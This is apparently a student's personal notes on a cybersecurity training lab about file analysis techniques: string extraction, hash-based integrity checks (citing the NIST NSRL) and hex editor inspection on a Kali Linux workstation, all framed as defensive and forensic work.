adam's notes

Lab - Using File Analysis Techniques

Scenario

In this lab, you will learn about various file analysis techniques.

As a cybersecurity analyst, you are working to discover weaknesses and vulnerabilities that your organization, Structureality Inc., needs to mitigate throughout its internal network. In this lab, you will first extract strings from files. Next, you will obtain a file and confirm its integrity with hashing. Finally, you will view and search a file using a hex editor.

Your cybersecurity analyst (CySA) workstation, running Kali Linux, is located in Structureality’s server subnet.

Understand your environment

You will be working from a virtual machine named KALI hosting Kali Linux.

File analysis with strings

When you encounter an unknown file on a system, you need to determine what it is and what it will do. One technique of file analysis is extracting the strings from the file for detailed examination and review. In this exercise, you will extract the strings from several files and view the contents.

File analysis: hash check

When downloading files, it is important to confirm that the file on the local drive has retained its integrity compared to the file being offered on the download site. This is often accomplished using hashing. In this exercise, you will work on a downloaded file and perform a hash check of the file.

Info

An excellent use for this skill of hash checking would be to verify all OS and application files have been protected against corruption. You can also discover the presence of known malware through hash matching as well. There are many places to obtain hash lists or databases. One great option is the NIST National Software Reference Library (NSRL).

File analysis with hexedit

Another file analysis technique is the use of a hex editor to view the contents of a file. However, rather than automatically extracting contents from a file, a hex editor is used to view, search, and edit data within a file. You have to already know what to look for. Thus, performing an initial string search may be necessary to find starting points and search terms to use in a hex editor.

You have now used a hex editor to look for strings or other content within a file. In a forensic investigation, this technique could be used to pinpoint the location of files that were deleted or damaged. From here, file recovery, file undeletion, or file carving operations may be used in an attempt to recover full or partial access to the file.

Graph View